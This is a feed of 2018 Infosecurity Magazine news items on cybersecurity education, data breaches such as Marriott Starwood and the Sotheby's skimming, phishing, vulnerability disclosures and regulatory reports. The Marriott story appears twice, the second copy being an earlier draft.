Info Security

Subscribe to Info Security  feed
Updated: 1 hour 7 min ago

#NICEK12: Hands-On Resources from the Field

Tue, 12/04/2018 - 03:09
#NICEK12: Hands-On Resources from the Field

In addition to the five conference tracks at the 2018 NICE K12 Cybersecurity Education Conference going on in San Antonio, Texas, attendees were also able to engage in hands-on learning at drop-in sessions during which exhibitors were able to share resources they have used with some success to help advance cybersecurity in the K-12 sector. 

In one session, two teachers from North Carolina showcased the progress they have made in educating kids about cybersecurity.

In their presentation, “Bytes for Breakfast - A Small Rural High School’s Answer to Getting Students Excited About Coding and Cybersecurity,” teachers Renee Himmelspach and Amanda Campbell from South Stokes High School in North Carolina said that the name of their club came from the fact that the group meets before school.

The Bytes for Breakfast club, which is in its first year, meets twice a month before the school day begins for students to explore coding using the two Raspberry Pi’s and iPad Pros that were donated to the group. The group also meets once a month after school for an extended period of time.

Credit: South Stokes High School

With as much enthusiasm as Himmelspach and Campbell displayed, Robert Black, CEO and founder of Start Engineering, showcased the Cybersecurity Career Guide, a book designed for classrooms, camps and other outreach programs to introduce students to the myriad career paths available in the field of cybersecurity. 

Credit: Start Engineering

In partnering with Palo Alto Networks, Start Engineering was able to produce the 52-page, magazine-style book that includes a description of different job types, as well as the required education and the likely salary candidates would earn for each position.

Designed for middle and high school students, the publication was released in April and will be updated every two years as job descriptions and technology evolves.

Categories: Cyber Risk News

#NICEK12: Creating a Paradigm Shift in Cyber

Tue, 12/04/2018 - 02:44
#NICEK12: Creating a Paradigm Shift in Cyber

At the 2018 NICE K12 Cybersecurity Education Conference in San Antonio, Texas, industry leaders spoke about promoting cyber awareness by educating kids so that they can in turn educate their parents and move the needle on protecting privacy in our interconnected world. 

In his presentation, “The Thief Is One Hundred Years Ahead of the Locksmith,” Ronald Malden, chief learning officer, Regal Business Opportunities Inc., offered a strategic plan for the national initiative of accelerating cybersecurity learning and skills development in a diverse user community.

Because criminals are able to remain one step ahead of whatever lock defenders invent, education is far more useful than inventing new defenses. 

“In this day and age, we have to educate the children if we are ever to achieve cyber awareness across a diverse workforce environment. In today’s current cyber environment, when I focus on general education, I’m actually focused on what we need to accomplish in K-12 in order to educate the entire society,” Malden said.  

So how do we become more cyber aware? According to Malden, approaching cyber in general education from a K-12 perspective includes both technical and nontechnical content because computing communication is occurring when you wake up and does not stop when you sleep. “We need to educate cyber knowledge across the life spectrum as well as teach it in small doses in diverse general education, which includes teaching cyber in physics, law and philosophy.”

To be successful in that endeavor, it’s important to target the audience messenger, or the trusted person, providing educators with an approach that tells them how to educate the population in general.

“Students should be graduating cyber certified so that they understand penetration detection, intrusion detection and what it means to be cyber aware so they are not the victim,” Malden said. “A cyber-hacker is looking for money. If you are no longer the low-hanging fruit, then you have less of a loss.”

The industry needs to develop a paradigm shift that delivers us from defensive to offensive education. To achieve that, Malden said we must address the education of all individuals and increase involvement in cyber education by integrating cyber domain concepts as organization ethos or curriculum in K-12 education.

Categories: Cyber Risk News

#NICEK12: Increasing Cyber Career Awareness

Mon, 12/03/2018 - 16:13
#NICEK12: Increasing Cyber Career Awareness

With a packed schedule of over 100 sessions across five tracks, the 2018 NICE K12 Cybersecurity Education Conference endeavored to deliver a wide array of strategies and tactics to enable educators and public schools to enhance their understanding of how to engage students in cybersecurity. 

The five tracks included increasing cybersecurity career awareness, infusing cybersecurity across the educational portfolio, integrating innovative cybersecurity educational approaches, designing cybersecurity academic and career pathways and promoting cyber awareness. 

In talking about innovative ways to introduce students to career paths they may not even know exist, Benjamin Galynker, director of content, Hats & Ladders, spoke about how to go “From Overwhelmed or Slacking to Ethical Hacking.” 

It’s no mystery why the skills gap continues to grow despite industry demand. “The problem we face is understanding how to raise young people’s awareness of career options that their parents might not know about,” Galynker said. 

When it comes to cybersecurity, most people think it’s not for them or more likely that it couldn’t be for them, which is why awareness matters. Society works best when young people pursue careers that they are confident will allow them to succeed in their futures, Galynker said.

There are some missing links, though, between awareness and "what should I do next," which is where educators and schools play a key role. Hats & Ladders is one way to make educators aware of the industry’s efforts to create platforms that will help engage students. 

The organization is intended to connect educators and mentors, industry partners, colleges and community programs to help students begin to understand the career opportunities available to them through online learning, as well as helping educators incorporate into their curriculum more hands-on DIY activities, field trips and observations, internships, apprenticeships and scholarships.

Part of the effort is to help educators understand the root sources. To that end, Hats & Ladders developed a free platform to fill in those missing links, taking students from curiosity to interest, engagement and motivation. 

Often, youth will rely on their own knowledge without realizing what they don’t know. They think they know what they want to do, but they don’t have a second or third choice, nor do they understand the career assets they might have and how they can use those assets to pivot into potential cybersecurity careers. 

“Youth don’t have a lot of career development counseling,” Galynker. “[For] every 437 high school students, there is only one high school counselor, making parents the single largest influence on young people’s careers.”

Categories: Cyber Risk News

#NICEK12: Young Women Are Making Cyber Waves

Mon, 12/03/2018 - 15:19
#NICEK12: Young Women Are Making Cyber Waves

In a pre-conference workshop, 2018 NICE K12 Cybersecuirty Education Conference sponsor IBM offered #CyberDay4Girls, in which girls in 6th–9th grade met at Sam Houston High School to learn about protecting their online identity and the internet of things and to meet female role models studying and working in cybersecurity. 

Part of the goal is shifting the perspective and teaching girls to be brave, not perfect, said Kyla Guru, a high school junior from Illinois and founder of Bits N’ Bytes Cybesecurity Education (BNBCE) in her keynote address.

Guru first thanked the audience for involving her in the dialogue about what she called our "state of cyber-insecurity." “What is the current state?” Guru asked. “An expected 1.8 million cybersecurity jobs that will be unfilled by 2022. In 2017, the education sector alone accounted for 13% of breaches, which amounts to the compromise of around 32 million records. In addition, we are expected to lose $8 million by 2022.”

Her goal is to make sure that we all understand the monetary loss that will happen because of cyber-attacks so that rather than lose that money, we can try to save that money for future generations to invest in saving the future.

“We are making waves,” Guru said, “and that calls for some sort of applause. We need some recognition for the progress we have made so that we can get excited about the work that still needs to be done.”

In explaining her vision, Guru explained why she came to create BNBCE. The idea came to her when thinking about the requirement that she and her fellow students had to sign the student science lab safety contract every year. After seven years, she had the contract memorized.  

“I know that after you get chemicals in your eyes, you have to wash your eyes out for 20 minutes at the wash station. Those have been made second nature because of the emphasis that teachers have put on it. So I started to think, ‘What if we could make something like this for cybersecurity?’ because that is the power of education.”

Recognizing that the digital internet is the new playground for young people, Guru said she realized that her peers didn’t have security as a second nature to them. “I set out to create a five-minute animated video for my former elementary school, but after I made the video, I realized that the problem couldn’t be solved by one video sent to one school down the street from my house. This mission was so much bigger than this one school.”

From there, Guru created the national nonprofit that started with youth. Why? “It is incredible impressive and slightly concerning how much we use technology. Also, young people are going to build technology. Shouldn’t they know how to deal with and manage the situations that will come along with that technology?” she said.

In the past 24 months, the nonprofit has grown to include 26 partners. BNBCE has written 40 articles on its blog and hosted more than 35 workshops, amounting to an outreach that has connected with 15,722 students.

Categories: Cyber Risk News

#NICEK12: San Antonio Aims to Become Cyber City, USA

Mon, 12/03/2018 - 14:45
#NICEK12: San Antonio Aims to Become Cyber City, USA

The 2018 NICE K12 Cybersecurity Education Conference kicked off this morning in San Antonio, Texas, with opening remarks from Ron Niremberg, mayor of San Antonio. 

The National Initiative for Cybersecurity Education (NICE) is part of the National Institute of Standards and Technology (NIST) and aims to deliver quality professional development focused on strategies that will inspire awareness about cybersecurity preparedness for young people while also inspiring them to explore the myriad careers within the industry. 

“I can’t think of a more important educational initiative,” said Niremberg. “The city’s cyber roots go almost as far back as our military history. Today San Antonio is second only to Washington, D.C., in terms of cybersecurity assets.”

Over the past few years, the US Cyber Command has brought more than 1,000 new jobs to San Antonio, resulting in hundreds of millions of dollars of economic impact. In addition to the robust cybersecurity industry, the city boasts over a dozen colleges and universities with cybersecurity programs.

Advancements continue to be made. According to the mayor, in the last two months, San Antonio has had two very exciting announcements related to work in cyber. First, the University of Texas–San Antonio (UTSA) announced a significant investment in its AI and data science national security collaboration center. With a $33 million investment, UTSA will be expanding its downtown campus by developing a National Security Collaboration Center (NSCC) and a School of Data Science.

Second, Texas A&M was invited to join Facebook’s cybersecurity university program. Together, Facebook and Texas A&M–San Antonio have opened a $63 million science and technology building. 

The collective investments are an indication that “San Antonio leadership gets it. Cybersecurity is an extraordinary priority for us,” Niremberg said. 

“We know our community needs to continue to fund innovation and continue to invest in our future workforce, as we continue to build what we call Cyber City, USA. The work you are doing is critical for all.” 

Categories: Cyber Risk News

Reported Cybercrime Jumps 14% in England

Mon, 12/03/2018 - 11:10
Reported Cybercrime Jumps 14% in England

There has been an increase in the volume of cybercrime incidents reported to English police of 14% over the past two financial years, according to a new report.

Think tank Parliament Street filed Freedom of Information (FOI) requests with the country’s police forces, asking for a breakdown of Computer Misuse Act crimes which involve hacking, smart devices and/or connected devices.

Although it received back a full set of answers from just 14 out of a possible 39 forces, the findings could be viewed as illustrative of broader trends.

The total number of cybercrimes over the two-year period was 2547, rising from 1193 in 2016/17 to 1354 in 2017/18.

Of those appraised, Cleveland Police reported the most cases in 2017/18 with 356, followed by West Midlands (329) and Nottinghamshire Police (246).

The latter two also reported the biggest increases from the previous year, of 19% and 21% respectively.

However, interestingly, London’s Metropolitan Police reported a drop in cybercrime cases, from just 77 in 2016/17 to 49 in 2017/18.

Anecdotally, unauthorized access of email and social media accounts to obtain and distribute personal photos figured strongly in cases. On the corporate side, the report also highlights ransomware as a common factor in cases.

“It’s clear that the tidal wave of cybercrime is draining the resources of police forces as well as businesses. Tackling this problem requires a concerted effort to recruit staff equipped with the latest cyber skills as well as extending education and training opportunities to existing employees,” argued Sheila Flavell, chair of the Institute of Coding.

“As part of this effort, it’s vital that industry works more closely with academic institutions, to develop specialist flexible courses, so that skills within workforces increase dramatically.”  

The report itself calls for mandatory cyber training for all new police recruits in line with nationally recognized standards; more help from tech and social media companies to train officers; and an increase in STEM-qualified officers.

“As well as working closely with universities and training colleges, industry organizations should also offer placement years and consultancy to ensure that police forces are fully equipped to deal with this threat,” it advised.

The tech sector is stepping up to a certain extent: last week Cisco announced it would be providing free access to its Cisco Networking Academy to help train 120,000 officers.

Categories: Cyber Risk News

Kaspersky Lab's US Ban Appeal Thrown Out

Mon, 12/03/2018 - 10:22
Kaspersky Lab's US Ban Appeal Thrown Out

Eugene Kaspersky has vowed that his firm will continue its mission to protect global organizations after a US court threw out its appeal to have a ban on federal use of its products overturned.

On Friday, a US Court of Appeals for the District of Colombia Circuit upheld a district court ruling that the September 2017 Binding Operative Directive (BOD 17-01) and the Congressional National Defense Authorization Act (NDAA) do not violate the constitution.

Kaspersky Lab had argued in court that they violate the Fifth Amendment by interfering with due process.

Russian intelligence is said to have used Kaspersky Lab products to spy on top secret US government programs, but the firm has always denied any collusion.

Kaspersky himself was sanguine about the outcome.

“The DC Circuit Court’s decision is disappointing, but the events of the past year that culminated in this decision were almost expected, and not just by our company, but by the cybersecurity industry in general,” he wrote in a blog post.

“We’re sure that the issues involved in our litigation go far beyond technical aspects of US constitutional law; they include real-world problems concerning everyone: a progression of protectionism and balkanization in a world of understated cyber-rivalry and highly sophisticated international cyber threats.”

The Moscow-headquartered firm had launched a Global Transparency Initiative in an attempt to restore trust with customers. This includes three new Transparency Centers in the US, APAC and Europe, where trusted partners can access reviews of the company’s code, software updates, threat detection rules and more.

The first such center was recently opened in Switzerland.

“We’re addressing customers’ concerns by ensuring that our own operations are transparent and trustworthy with a respected firm auditing our engineering practices and secure development processes,” explained Kaspersky.

“We constantly aim to be a part of the solution as the cyber threat landscape evolves. Regardless of whether we decide to pursue further legal action in response to today’s decision from the DC Circuit Court, we’ll remain committed to providing the best cybersecurity solutions for our customers globally and saving the world from cyber threats.”

Categories: Cyber Risk News

Southeby’s Site Infected with Magecart for Over a Year

Mon, 12/03/2018 - 09:40
Southeby’s Site Infected with Magecart for Over a Year

Sotheby’s has become the latest big-name brand to have its website infected with digital skimming code.

The venerable British auction house revealed on Friday that its New York-based e-commerce marketplace Sotheby’s Home, known formerly as Viyet, was affected.

According to the statement, the firm discovered and “promptly removed” on October 10 malicious code inserted onto the site by a malicious third party. However, it had been there since “at least” March 2017, meaning countless customers could have been affected over the 19 month-period.

In fact, it could be even longer. Sotheby’s admitted: “we cannot be certain as to when the website was first victimized by this attack.”

“The code was designed to target the data you entered into the payment information form on the Sotheby’s Home website,” it added. “This information would include your name, address, email address and payment card number, expiration date, and CVV code.”

The incident would seem to indicate that the group behind this scheme infected the site directly, in a similar way to skimming attacks on British Airways and Newegg sites, rather than via a third-party supplier, as happened to Ticketmaster.

Given that it has taken nearly two months for the auctioneer to come clean about the incident, it could be in trouble with European GDPR regulators if any EU citizens’ data has been swiped — although that’s unlikely given the site is designed for only US customers.

However, it could be too late for many of those affected. RiskIQ claimed recently that British Airways and Newegg customers’ credit card details went up for sale on the dark web little more than a week after they were skimmed from the respective sites.

Several groups are thought to be actively using the code around the world, with recent revelations that one is even attempting to sabotage the activities of another in order to maximize its profits.

Categories: Cyber Risk News

Marriott Starwood Hack: Data of 500 Million Hotel Guests 'Compromised'

Fri, 11/30/2018 - 12:42
Marriott Starwood Hack: Data of 500 Million Hotel Guests 'Compromised'

Hotel chain Marriott has confirmed widespread reports of a significant data breach with the sensitive details of 500 million customers possibly compromised.

In an online statement, the company said: “On September 8, 2018, Marriott received an alert from an internal security tool regarding an attempt to access the Starwood guest reservation database. Marriott quickly engaged leading security experts to help determine what occurred.

“Marriott learned during the investigation that there had been unauthorized access to the Starwood network since 2014. Marriott recently discovered that an unauthorized party had copied and encrypted information, and took steps towards removing it. On November 19, 2018, Marriott was able to decrypt the information and determined that the contents were from the Starwood guest reservation database.

“Marriott has not finished identifying duplicate information in the database, but believes it contains information on up to approximately 500 million guests who made a reservation at a Starwood property.”

The statement explained that the information copied from the Starwood guest reservation database over time includes information about guests who made a reservation at a Starwood property, including names, mailing addresses, phone numbers, email addresses, passport numbers, Starwood Preferred Guest (“SPG”) account information, dates of birth, gender, arrival and departure information, reservation dates, and communication preferences.

“For some, the information also includes payment card numbers and payment card expiration dates, but the payment card numbers were encrypted using Advanced Encryption Standard encryption (AES-128). There are two components needed to decrypt the payment card numbers, and at this point, Marriott has not been able to rule out the possibility that both were taken.”

“Marriott deeply regrets this incident happened,” the company added. “From the start, we moved quickly to contain the incident and conduct a thorough investigation with the assistance of leading security experts. Marriott is working hard to ensure our guests have answers to questions about their personal information with a dedicated website and call center. We are supporting the efforts of law enforcement and working with leading security experts to improve. Marriott is also devoting the resources necessary to phase out Starwood systems and accelerate the ongoing security enhancements to our network.” 

Javvad Malik, security advocate at AlienVault, said: “This seems like a particularly big breach, not just because of the number of records taken, but also the details that were contained within. It appears as if detection capabilities were not adequate, taking several weeks to notice the breach and extraction of records. It is good that the credit card database was encrypted, but if, according to the company, the attackers were able to take the decryption key, then it was of no use. The digital equivalent of leaving the key for the front door under the mat.”

Jake Moore, cybersecurity expert at ESET UK, advised victims of the breach to keep a watchful eye on where their data may end up.

“Be alert to the idea that hackers may well target you for the final few pieces of information that they couldn’t get hold, perhaps in follow-up phishing emails, in an attempt to take over your identity in the coming days – if they haven’t done so already in the past,” he said. “This is particularly something to be mindful of if you visited one of the effected hotels on business and may not necessarily remember which hotels you visited.”

Categories: Cyber Risk News

Marriot Starwood Hack: Data of 500,000 Million Hotel Guests 'Compromised'

Fri, 11/30/2018 - 12:42
Marriot Starwood Hack: Data of 500,000 Million Hotel Guests 'Compromised'

News has surfaced that hotel chain Marriott has suffered a significant data breach with the sensitive details of 500 million customers possibly compromised.

In an online statement, the company said: “On September 8, 2018, Marriott received an alert from an internal security tool regarding an attempt to access the Starwood guest reservation database. Marriott quickly engaged leading security experts to help determine what occurred.

"Marriott learned during the investigation that there had been unauthorized access to the Starwood network since 2014. Marriott recently discovered that an unauthorized party had copied and encrypted information, and took steps towards removing it. On November 19, 2018, Marriott was able to decrypt the information and determined that the contents were from the Starwood guest reservation database.

“Marriott has not finished identifying duplicate information in the database, but believes it contains information on up to approximately 500 million guests who made a reservation at a Starwood property.”

The statement explained that the information copied from the Starwood guest reservation database over time includes information about guests who made a reservation at a Starwood property, including names, mailing addresses, phone numbers, email addresses, passport numbers, Starwood Preferred Guest (“SPG”) account information, dates of birth, gender, arrival and departure information, reservation dates, and communication preferences.

"Marriott deeply regrets this incident happened," the firm added. “From the start, we moved quickly to contain the incident and conduct a thorough investigation with the assistance of leading security experts. Marriott is working hard to ensure our guests have answers to questions about their personal information with a dedicated website and call center. We are supporting the efforts of law enforcement and working with leading security experts to improve. Marriott is also devoting the resources necessary to phase out Starwood systems and accelerate the ongoing security enhancements to our network.” 

Infosecurity will endeavor to bring you more on this story as it develops.

Categories: Cyber Risk News

Undervalued Assets Put Business at Risk

Fri, 11/30/2018 - 12:06
Undervalued Assets Put Business at Risk

New research from the Ponemon Institute, in partnership with DocAuthority, found that IT security departments are underestimating the value of business documents by hundreds of thousands of dollars.

In a newly published report, the Ponemon Institute found that despite being responsible for their management and protection, IT security departments are undervaluing a range of business assets, from research and development to financial reports. In contrast, they are over-prioritizing less-sensitive data related to personally identifiable information (PII).

The study found that IT security departments predicted that it would cost a business $306,545 to reconstruct an R&D document, while the R&D department estimated the reconstruction cost at $704,619, more than double what the IT security department estimated.  

Additionally, IT security departments estimated that the impact of a financial report being leaked at $131,570, compared to the $303,182 that the finance department believes it would incur from a security incident.

“The recent Ponemon report about data value illustrates the importance of understanding the relationships between organizations and third parties and the value of the information being shared. Only by doing so can organizations fully understand risk and properly prioritize effort and control,” said Matan Or-El, CEO of Panorays.

When IT security departments undervalue these assets, they also underestimate the safeguards that should be put in place in order to protect the business assets, thereby increasing the security risk.

The report also found that when organizations underinvest in protecting the more critical data, the result is money wasted on protecting meaningless data or the mishandling of access rights for employees.

"Typically, the security and protection of business data is considered to be the responsibility of the IT security department. Yet it’s clear from this research that IT security does not have the vitally important context required to understand the true value of that data and, in turn, create an effective strategy for defending it,” said Dr. Larry Ponemon, chairman and founder of the Ponemon Institute in a press release. “Rather than being relegated to IT, data and its protection should be the concern of not only management level, but the business as a whole.”

Categories: Cyber Risk News

Request for Gift Card Purchases in Phishing Emails

Fri, 11/30/2018 - 11:44
Request for Gift Card Purchases in Phishing Emails

Hackers are deep in the spirit of exploiting the holidays for financial gain, which is why it’s unsurprising that yet another new type of spear phishing attack has emerged, in which attackers are posing as CEOs to trick office managers, executive assistants and receptionists into sending them gift cards, according to email security researchers at Barracuda Networks.

Since early October, the researchers have reportedly seen an uptick in these types of attacks. Unlike other phishing campaigns that include attachments, these emails do not have malicious links or files included. What also seems to be working effectively is that they are often sent from trusted email domains.

As a result, traditional email filters often do not recognize them as threats. Additionally, the attackers capitalize on the urgency of the holidays and poses the request as a company surprise to discourage the victim from confirming the legitimacy of the request.

Using the social engineering tactics of CEO impersonation, requests for secrecy, researching relevant details and implied urgency, the attackers are specifically and intentionally exploiting people’s good cheer during the holidays.

Credit: Barracuda Networks

In another example, an email message sent “from my Sprint Wireless 4G LTE Smartphone” asks the recipient to pick up gift cards to be distributed to staff but requests that she keep the transaction confidential.

“In all of these attacks, the emails were sent from free personal email services with a relatively high reputation. In addition, they do not contain any type of malicious payload, such as links or attachments,” wrote Barracuda’s Asaf Cidon, VP of content security services.

“Instead the emails rely solely on social engineering and impersonation to trick their targets. These types of attacks are very hard for traditional email filters to pick up because they are targeted, have a high reputation, and do not contain any obvious malicious signals.”

Categories: Cyber Risk News

Cisco Offers Cyber Training to UK Police Officers

Fri, 11/30/2018 - 11:34
Cisco Offers Cyber Training to UK Police Officers

Cisco is trumpeting a new initiative designed to improve the cybersecurity skills of UK police officers.

The US tech giant claimed its partnership initiative will see 120,000 officers in England, Scotland, Wales and Northern Ireland gain access to the Cisco Networking Academy.

This will provide training for individuals at all levels. The learning platform runs both in-person and online courses including: Introduction to Cybersecurity, Cybersecurity Essentials, CCNA [Cisco Certified Network Associate] Cybersecurity Operations and CCNA Security.

Andy Beet, futures lead at the Data Communications Group of the National Police Chiefs’ Council, welcomed the news.

“By joining the program, forces can access training designed to raise awareness and increase their understanding of cybercrime and cyber-threats, while also gaining insights into the procedures used to defend networks,” he explained.

“It’s important for all police officers to understand cybersecurity as fully as possible; by doing so they can develop their knowledge in this increasingly important area, improving security in both their professional and personal lives."

The police are certainly in need of extra resources to improve skills levels, but getting the funding is a struggle at a time of continued government-imposed austerity.

Two years ago, then-home secretary Theresa May announced new plans to draft in volunteers to help regular officers on cybercrime cases without the need to become special constables first.

Sixteen forces that responded to a recent FOI request from think tank Parliament Street spent an average of just £82,500 each on training over the past three years. However, a large proportion of this was accounted for by just a handful of forces, including North Wales Police (£375K), West Mercia & Warwickshire (£126K), and Lincolnshire (£120,000).

Cisco claims its Networking Academy has helped to train over eight million people globally since its launch 20 years ago.

Infosecurity has asked Cisco for clarification on the financial details of the deal and the courses that police will be able to access.

Categories: Cyber Risk News

NVRmini2 Network Video Recorder Vulnerabilities

Fri, 11/30/2018 - 11:22
NVRmini2 Network Video Recorder Vulnerabilities

The vulnerability research team at Digital Defense announced that it has discovered a zero-day vulnerability in the Nuuo NVRmini 2 network video recorder (NVR) firmware, software used by hundreds of thousands of surveillance cameras worldwide.

Reportedly caused by “improper sanitization of user-supplied inputs and lack of length checks on data used in unsafe string operations on local stack variables,” the flaw ("lite_mv" Remote Stack Overflow in NUUO NVRmini2 3.9.1) would allow an attacker to gain remote access as an unauthenticated user. The attacker could then execute arbitrary code with root privileges.

According to the researchers, NVRmini2 firmware version 3.9.1 and prior is vulnerable to an unauthenticated remote buffer overflow that could potentially be leveraged by an attacker. Exploiting the vulnerability could allow an attacker to modify the camera feeds to the NVR and change its configuration or recordings.

A patch has since been issued, and Digital Defense commended NUUO for its swift response in providing fixes to the security issue.

In related news, Tenable researcher David Wells recently disclosed a vulnerability (CVE-2018-15715) in Zoom applications for Windows and macOS that could also be exploited by an unauthorized user to invoke functions normally reserved for Zoom servers.

The two disclosed vulnerabilities in NVRs are indicative of the potential security problems in these internet of things (IoT) devices. According to Craig Young, computer security researcher for Tripwire’s vulnerability and exposure research team (VERT), NVRs are one of the earliest types of connected devices to be successful in the market.

Because they were so early to market, many of these systems haven’t evolved, making them vulnerable to the same types of basic flaws, Young said. “Anyone using the Nuuo NVRmini 2 needs to prioritize patch deployment for affected systems, regardless if the device is directly exposed to the Internet.

"This can be exploited with an unauthenticated HTTP request, and attackers can craft malicious web pages which search local networks for affected systems to compromise. This type of attack is known as cross-site request forgery and can come from malicious emails, advertisements, and even comment spam.”

Categories: Cyber Risk News

GCHQ Reveals Why Some Flaws Are Kept Secret

Fri, 11/30/2018 - 10:38
GCHQ Reveals Why Some Flaws Are Kept Secret

GCHQ has revealed for the first time how it researches vulnerabilities, claiming sometimes not to inform the vendor if a specific flaw could be used to its advantage.

The intelligence agency’s “Equities Process” involves a binary decision: disclose so a patch can be issued to improve the overall security of businesses and consumers, or hang on to it for reasons of national security.

“We say our default position is to disclose the problem and there has to be a very good reason not to — either an overriding intelligence case or the fact that disclosing could reduce the security of people who use the product — and we really do mean it,” explained Ian Levy, technical director of GCHQ’s National Cyber Security Centre (NCSC).

“Some people will say that we don’t need this process and that we should just disclose everything. In my opinion, that’s naïve — and I don’t think it’s got much to do with the NCSC being part of GCHQ and the wider UK intelligence community. If we were separate, the rest of the community would still do vulnerability research and we would be much less likely to see those vulnerabilities and have a voice in how they’re handled, so the UK would likely be at greater security risk.”

The NCSC was at pains to point out the checks and balances that exist in the process to ensure that non-disclosure is only a decision taken in exceptional circumstances. This includes review by an Equities Technical Panel, an Equity Board, and finally, NCSC CEO, Ciaran Martin.

Questions asked by these panels include: how likely it is that the vulnerability could be discovered and exploited by someone else; what sectors would be exposed if it is left unpatched; and what the potential damage could be if the flaw is exploited.

“This process is complex and sometimes quite nuanced, relying on expert judgement around very detailed technical issues,” said Levy. “That’s true across the range of our work, not just this process, and I make no apology for it — we’re proudly expert.”

The decision-making process is said to be similar to the of the US intelligence agencies.

Jake Moore, cybersecurity expert at ESET UK, warned that the impact of non-disclosure could be severe.

“Just look at WannaCry where [NSA exploit] EternalBlue was kept quiet prior to its fix,” he argued.

“There are inevitably many weaknesses in computer software and operating systems that are yet to be patched, some of which will be left unpatched for a considerable amount of time. Not highlighting this to the vulnerable companies at risk could give cyber-criminals many opportunities to attack.”

Russell Haworth, CEO of Nominet, argued that businesses should be more self-reliant.

“Retaining some knowledge can help GCHQ protect the nation in the future. This story underlines that businesses should be taking their own steps to protect themselves from potential threats, not relying on others,” he added.

“Responsibility for cybersecurity begins at home. There are lots of technologies that can help identify if your network has been compromised, and take action.”

Categories: Cyber Risk News

FCA: Cyber Resilience a Top Concern for Financial Firms

Fri, 11/30/2018 - 09:18
FCA: Cyber Resilience a Top Concern for Financial Firms

The majority of financial firms rank cyber-resilience as their top concern, with people, visibility and third-party risk key challenges, according to the Financial Conduct Authority (FCA).

The UK regulator’s latest report, Cyber and Technology Resilience: Themes from cross-sector survey 2017 – 2018, is based on interviews with nearly 300 firms over the past 24 months.

The number of technology outages reported to the FCA over the past year increased 138%, with cyber-attacks accounting for 18% of operational incidents.

The report revealed that nearly 80% of respondents have problems understanding what information they hold and gaining visibility into third parties. Third-party failures accounted for 15% of operational incidents.

Identifying and managing high-risk staff and then educating employees with access to critical systems/sensitive data was another key concern.

FCA executive director of supervision, Megan Butler, said it is a worry that many firms still seem to be struggling with the cybersecurity basics.

“A third of firms do not perform regular cyber assessments. Most know where their data is. But describe it as a challenge to maintain that picture. Nearly half of firms do not upgrade or retire old IT systems in time. Only 56% say they can measure the effectiveness of their information asset controls,” she said.

“Only the largest firms have automated their detection systems to spot potential cyber-attacks. Smaller firms are generally relying on old school, manual processes - or no processes at all. A problem if you need to respond to a fast-moving incident like a WannaCry or NotPeya attack.”

The most mature organizations are in non-bank payments, retail banking, and wholesale banking while those at the other end of the cybersecurity scale are in wholesale markets, retail investments, and retail lending.

However, the FCA warned financial sector firms of their commitment to transparency, claiming there’s evidence of under-reporting. It is in discussion with companies over 186 cases where the root cause of a cyber incident still hasn’t been revealed.

Butler urged firms to improve awareness programs as a matter of priority.

“At the moment, a lot of firms — 90% in fact — tell us that they operate a cyber awareness program. But a theme of today’s report is that businesses are struggling to identify and manage high risk staff, including those who deal with critical and sensitive data,” she said.

“By creating a positive security culture you can build a truly resilient business. You can use the eyes and ears of your firm to react and respond to threats quickly and accurately and hopefully deal with issues before they ever become an incident. Recognizing this success then helps to build and reinforce that secure culture.”

The FCA bared its regulatory teeth most recently by fining Tesco Bank over £16m for failings which led to hackers stealing millions from its customers in 2016.

Categories: Cyber Risk News

Attackers Run on Dunkin's DD Perks Rewards

Thu, 11/29/2018 - 16:14
Attackers Run on Dunkin's DD Perks Rewards

Boston-based Dunkin’, the brand formerly known as Dunkin Donuts, has released a warning to its customers stating that DD Perks reward account holders were potentially hacked by a third party in a credential-stuffing attack wherein hackers were trying to steal the rewards points to sell and trade them on the dark web.

The incident was discovered on October 31, 2018, by one of Dunkin’s security vendors, and it is believed that malicious third-party actors used credentials stolen from other breaches to access user accounts.

According to a statement shared with Infosecurity Magazine by a Dunkin’ spokesperson, “Dunkin’ Brands has issued notification letters to certain DD Perks account holders who may have experienced unauthorized access to their accounts.”

Additionally, the company's incident advisory warned that the attackers might have accessed the first and last names of impacted account holders, along with their email addresses and 16-digit DD Perks account number and their DD Perks QR code. Dunkin’ said it forced a password reset so that all potentially affected account holders would have to log out and use a new password to log back in to their accounts.

“Just when you thought that hackers could not come between you and your morning coffee, they get you right in the rewards points. NuData Security has found that 90% of cyberattacks start with some sort of automation, credential stuffing being a prominent one like the one perpetrated on Dunkin’,” said Ryan Wilk, VP of customer success for NuData Security, a Mastercard company.

“The software for credential stuffing is now so affordable that this type of attack is becoming accessible for almost anyone. What this means is that adversaries can automatically cycle through username and password pairs against login portals. This technique, known as credential stuffing, is a type of brute force attack whereby large sets of credentials are automatically inserted into login pages until a match with an existing account is found."

While customers are advised to change their passwords, Wilk said this is only a temporary fix that fails to address the root of the problem. “One effective way to stop this type of attack is to implement security solutions that detect this sophisticated automated activity at login and other placements. By using technologies that include behavioral biometrics, automated activity is flagged at login before it can even test any credentials in the company's environment.”

Categories: Cyber Risk News

NSA Exploits Not Silent but Eternally Problematic

Thu, 11/29/2018 - 15:09
NSA Exploits Not Silent but Eternally Problematic

It’s been over a year since patches to protect against the leaked NSA exploits were released, yet Akamai has published research revealing the continued use of the Eternal family of exploits with evidence of a new version of the UPnProxy vulnerability targeting unpatched computers behind the router’s firewall.

In a new and widely distributed campaign, a family of injections dubbed EternalSilence has been leveraging the Eternal family of exploits. According to the research, exploiting the vulnerability allows attackers to burrow through the router, infecting individual computers on the network. The UPnProxy vulnerability affords attackers deeper insight into the devices they can target while strengthening the malicious network. 

Researchers discovered more than 45,000 devices have been compromised, which is estimated at over a million computers waiting for commands, but they have not been able to gain insight into what happens post-injection. “They can only see the injections themselves and not the final payloads that would be directed at the machines exposed. However, a successful attack could yield a target rich environment, opening up the chance for such things as ransomware attacks, or a persistent foothold on the network,” Akamai’s Chad Seaman wrote.

Victims of the attack may very well not know that they have been targeted, particularly if their existing machines on the internet have already been segmented, the research said. As a result, any unpatched machines within the network will be easy targets.

“It was only a matter of time before the leaked NSA exploits would be used yet again for malicious purposes. It’s been over a year since these hacking tools first came on the scene, and even despite the number of successful attack methods that have since ensued, many organizations are still vulnerable to these exploits,” said Tyler Moffitt, senior threat research analyst, Webroot. “Unless properly patched, cyber-criminals are only going to continue using them in attacks for profit.

“There will always be zero-day vulnerabilities, but it’s worth noting that the vast majority of exploit attacks seen in the wild involve cyber-criminals targeting known vulnerabilities. These vulnerabilities have already been fixed by the vendor, but the fix has not been deployed and installed by the end user. There is without doubt a window of opportunity for cyber-criminals to take advantage.”

Categories: Cyber Risk News

Attackers Keen on Automated Browsers

Thu, 11/29/2018 - 14:35
Attackers Keen on Automated Browsers

